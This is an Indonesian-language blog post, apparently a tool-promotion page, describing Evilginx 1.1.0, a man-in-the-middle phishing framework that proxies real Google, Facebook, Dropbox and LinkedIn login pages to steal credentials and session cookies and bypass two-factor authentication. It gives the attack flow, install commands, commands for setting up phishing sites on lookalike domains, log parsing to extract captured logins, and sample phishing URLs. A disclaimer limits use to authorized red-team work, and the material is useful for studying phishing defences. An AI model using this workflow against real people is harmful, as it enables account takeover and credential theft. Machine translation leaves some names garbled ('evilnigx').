Evilginx 1.1.0: Kerangka Serangan Phishing dengan Bypass Otentikasi Dua Faktor yang ditulis dengan Python

  • Whatsapp
Evilginx 1.1.0 - Kerangka Serangan Phishing dengan Bypass 2FA yang ditulis dengan Python
Evilginx 1.1.0 - Kerangka Serangan Phishing dengan Bypass 2FA yang ditulis dengan Python


Tentang Evilginx 1.1.0 – Kerangka Serangan Phishing dengan Bypass Otentikasi Dua Faktor

Evilginx adalah Kerangka Serangan Man-In-The-Middle yang digunakan untuk kredensial phishing dan cookie sesi dari layanan web apa pun. Inti ini berjalan di server HTTP Nginx, yang menggunakan proxy_pass dan sub_filter untuk proxy dan memodifikasi konten HTTP, sambil mencegat lalu lintas antara klien dan server.

   Anda dapat mempelajari cara kerjanya dan cara memasang semuanya sendiri di posting blog penulis:
* Posting pertama agak ketinggalan jaman sekarang: Evilginx – Phishing Tingkat Lanjut Dengan Bypass Otentikasi Dua Faktor
* Pembaruan Evilginx 1.0: Evilginx 1.0 Update – Tingkatkan Game Anda di 2FA Phishing
* Pembaruan Evilginx 1.1: Evilginx 1.1 Memperbarui

Bagaimana Evilginx 1.1.0 bekerja?
1, Penyerang menghasilkan tautan phishing yang menunjuk ke servernya yang menjalankan Evilginx: https://accounts.notreallygoogle.com/ServiceLogin?rc=https://www.youtube.com/watch?v=dQw4w9WgXcQ&rt=LSID

Parameter dalam URL singkatan dari:
   rc = Saat berhasil masuk, korban akan diarahkan ke tautan ini misalnya dokumen yang dihosting di Google Drive.
   rt = Ini adalah nama cookie sesi yang disetel di browser hanya setelah berhasil masuk. Jika cookie ini terdeteksi, ini akan menjadi indikasi untuk Evilginx bahwa proses masuk berhasil dan korban dapat diarahkan ke URL yang disediakan oleh parameter rc.

2, Korban menerima tautan phishing penyerang melalui saluran komunikasi yang tersedia (email, messenger, dll.).

3, Korban mengklik tautan dan disajikan dengan halaman masuk Google proksi Evilginx.

4, Korban memasukkan kredensial akunnya yang valid, maju melalui tantangan otentikasi dua faktor (jika diaktifkan) dan dia diarahkan ke URL yang ditentukan oleh rc parameter. Pada saat ini rd cookie disimpan untuk tidak benar-benargoogle.com domain di browser korban. Mulai sekarang, jika cookie ini ada, dia akan langsung diarahkan ke rc URL, saat tautan phishing dibuka kembali.

5, Penyerang sekarang memiliki email dan kata sandi korban, serta cookie sesi yang dapat diimpor ke browser penyerang untuk mengambil kendali penuh dari sesi yang masuk, melewati perlindungan otentikasi dua faktor yang diaktifkan pada akun korban.
Mari kita mundur beberapa langkah dan mencoba mendefinisikan hambatan utama dalam upaya phishing tradisional.

Masalah pertama dan utama dengan phishing untuk kredensial adalah Otentikasi Dua Faktor. Anda dapat membuat template dengan tampilan terbaik yang menghasilkan lusinan login dan kata sandi, tetapi Anda akhirnya akan terhalang ketika dimintai token verifikasi yang datang melalui SMS. Tidak hanya akan menghentikan Anda untuk maju lebih jauh, tetapi juga akan memberi tahu pemilik akun, ketika mereka menerima peringatan upaya masuk.

Masalah kedua dengan template phishing adalah, mereka harus mengizinkan untuk menerima login dan kata sandi apa pun, karena mereka tidak memiliki sarana untuk mengonfirmasi validitasnya. Itu akan, kadang-kadang, meninggalkan Anda dengan kredensial yang tidak valid.

Masalah ketiga adalah harus membuat template phishing. Kuba Gretzky tidak tahu tentang Anda, tetapi baginya proses menyalin tata letak situs, menghapus javascript, memperbaiki CSS dan menulis sendiri pengganti kode javascript yang dilucuti untuk membuat layar login berperilaku seperti aslinya, sangat menjengkelkan. Rasanya tidak enak untuk membuat ulang sesuatu, yang telah dilakukan.

Dalam beberapa bulan terakhir Kuba Gretzky telah bekerja pada perangkat lunak proxy HTTP mirip ettercap yang ditulis dalam C++, menggunakan perpustakaan Boost::Asio untuk efisiensi maksimum. Kuba Gretzky diimplementasikan Strip SSL, Pemalsuan DNS dan HSTS jalan pintas. Solusi ini bekerja dengan sempurna di Jaringan Area Lokal, tetapi dia bertanya-tanya apakah ide yang sama dapat digunakan kembali untuk phishing jarak jauh, tanpa perlu menggunakan perangkat lunak yang dibuat khusus.

Kuba Gretzky (penulis) mendapat wahyu ketika dia membaca buku yang bagus posting blog oleh @i_bo0om.@i_bo0ommenggunakan server HTTP Nginx proxy_pass fitur dan sub_filter modul untuk mem-proksi halaman login Telegram yang sebenarnya kepada pengunjung, mencegat kredensial dan cookie sesi saat itu juga menggunakan serangan Man-In-The-Middle. Artikel ini membuat saya menyadari bahwa Nginx dapat digunakan sebagai proxy untuk server eksternal dan itu memicu ide Evilginx. Idenya sempurna – sederhana namun efektif.

Izinkan Kuba Gretzky untuk berbicara sedikit tentang Evilginxproses penelitian, sebelum dia fokus pada instalasi dan penggunaan.

Penafian tentang Evilginx 1.1.0 – Kerangka Serangan Phishing dengan Bypass Otentikasi Dua Faktor
   Saya sadar bahwa Evilginx dapat digunakan untuk tujuan yang sangat jahat. Pekerjaan ini hanyalah demonstrasi dari apa yang dapat dilakukan oleh penyerang yang mahir. Pembela bertanggung jawab untuk mempertimbangkan serangan tersebut, saat menyiapkan pertahanan, dan menemukan cara untuk melindungi dari metode phishing ini. Evilginx harus digunakan hanya dalam tugas pengujian penetrasi yang sah dengan izin tertulis dari pihak yang akan di-phishing.

Hall of Fame Kontributor: @poweroftrue

Instal dan Jalankan Evilginx 1.1.0:
   sudo su
   git clone https://github.com/kgretzky/evilginx
   cd evilnigx
   bash install.sh
   python evilnigx.py

Menggunakan Evilginx 1.1.0
Mengaktifkan atau menonaktifkan konfigurasi situs untuk digunakan dengan server Nginx, menggunakan template Evilginx yang disediakan dari direktori situs.
penggunaan: pengaturan evilginx.py [-h] [-d DOMAIN] [-y]
(-l | –enable ENABLE | –disable DISABLE)

argumen opsional:

-h, –help tampilkan pesan bantuan ini dan keluar
-d DOMAIN, –domain DOMAIN
Domain phishing Anda.
-y Jawab semua pertanyaan dengan ‘Ya’.
-l, –list Daftar aplikasi yang didukung yang tersedia.
–enable ENABLE Mengaktifkan situs berikut berdasarkan nama.
–disable DISABLE Nonaktifkan situs berikut dengan nama.

Daftar templat konfigurasi situs yang tersedia:
pengaturan python evilginx.py -l

Daftar situs yang didukung yang tersedia:


– dropbox (/root/evilginx/sites/dropbox/config)

subdomain: www
– google (/root/evilginx/sites/google/config)
subdomain: akun, ssl
– facebook (/root/evilginx/sites/facebook/config)
subdomain: www, m
– linkedin (/root/evilginx/sites/linkedin/config)
subdomain: www

Aktifkan situs phishing google dengan domain phishing yang telah didaftarkan sebelumnya tidak-benar-google.com:
      python evilginx.py setup –aktifkan google -d not-really-google.com

Nonaktifkan situs phishing facebook: pengaturan python evilginx.py –nonaktifkan facebook

   Mengurai
Parsing log Nginx untuk mengekstrak kredensial login dan cookie sesi yang dicegat. Log, secara default, disimpan di direktori log, tempat skrip evilginx.py berada. Ini dapat dilakukan secara otomatis setelah Anda mengaktifkan parsing otomatis di fase Setup.
penggunaan: evilginx.py parse [-h] -S SITUS [–debug]

argumen opsional:

-h, –help tampilkan pesan bantuan ini dan keluar
-s SITE, –site SITE Nama situs untuk mengurai log (‘semua’ untuk mengurai log
untuk semua situs).
–debug Tidak memotong file log setelah penguraian.

Parsing log hanya untuk situs google: python evilginx.py parse -s google
Parsing log untuk semua situs yang tersedia: python evilginx.py parse -s all

   Buat URL
Hasilkan URL phishing yang dapat Anda gunakan dalam Penilaian Tim Merah Anda.
penggunaan: evilginx.py genurl [-h] -s SITUS -r REDIRECT

argumen opsional:

-h, –help tampilkan pesan bantuan ini dan keluar
-s SITUS, –site SITE Nama situs untuk menghasilkan tautan.
-r REDIRECT, –redirect REDIRECT
Arahkan ulang pengguna ke URL ini setelah berhasil masuk.

Hasilkan URL phishing google yang akan mengarahkan korban ke video rick’roll saat login berhasil:
python evilginx.py genurl -s google -r https://www.youtube.com/watch?v=dQw4w9WgXcQ

Menghasilkan URL phishing berikut:

: https://accounts.not-really-google.com/ServiceLogin?rc=0aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g_dj1kUXc0dzlXZ1hjUQ
: https://accounts.not-really-google.com/signin/v2/identifier?rc=0aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g_dj1kUXc0dzlXZ1hjUQ

Demo video Evilginx 1.1.0 – Kerangka Serangan Phishing dengan Bypass 2FA:

Dan ingin mengatakan sesuatu tentang GitHackTools atau Evilginx 1.1.0? Komen di bawah atau share postingan ini dariGitHackTools Facebook,GitHackTools Twitter danGitHackTools Google Plus.

Bacaan Lainnya

Pos terkait

Tinggalkan Balasan

Alamat email Anda tidak akan dipublikasikan. Ruas yang wajib ditandai *